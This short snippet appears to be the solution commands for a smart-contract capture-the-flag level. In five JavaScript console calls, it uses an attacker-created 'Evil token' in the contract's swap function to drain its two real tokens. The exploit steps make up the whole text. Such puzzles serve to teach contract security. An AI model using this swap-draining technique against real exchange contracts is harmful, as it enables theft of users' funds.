# Command: <br />
1. evlToken = '<địa chỉ của Evil token>' <br />
2. t1 = await contract.token1() <br />
3. t2 = await contract.token2() <br />
4. await contract.swap(evlToken, t1, 100) <br />
5. await contract.swap(evlToken, t2, 200) <br />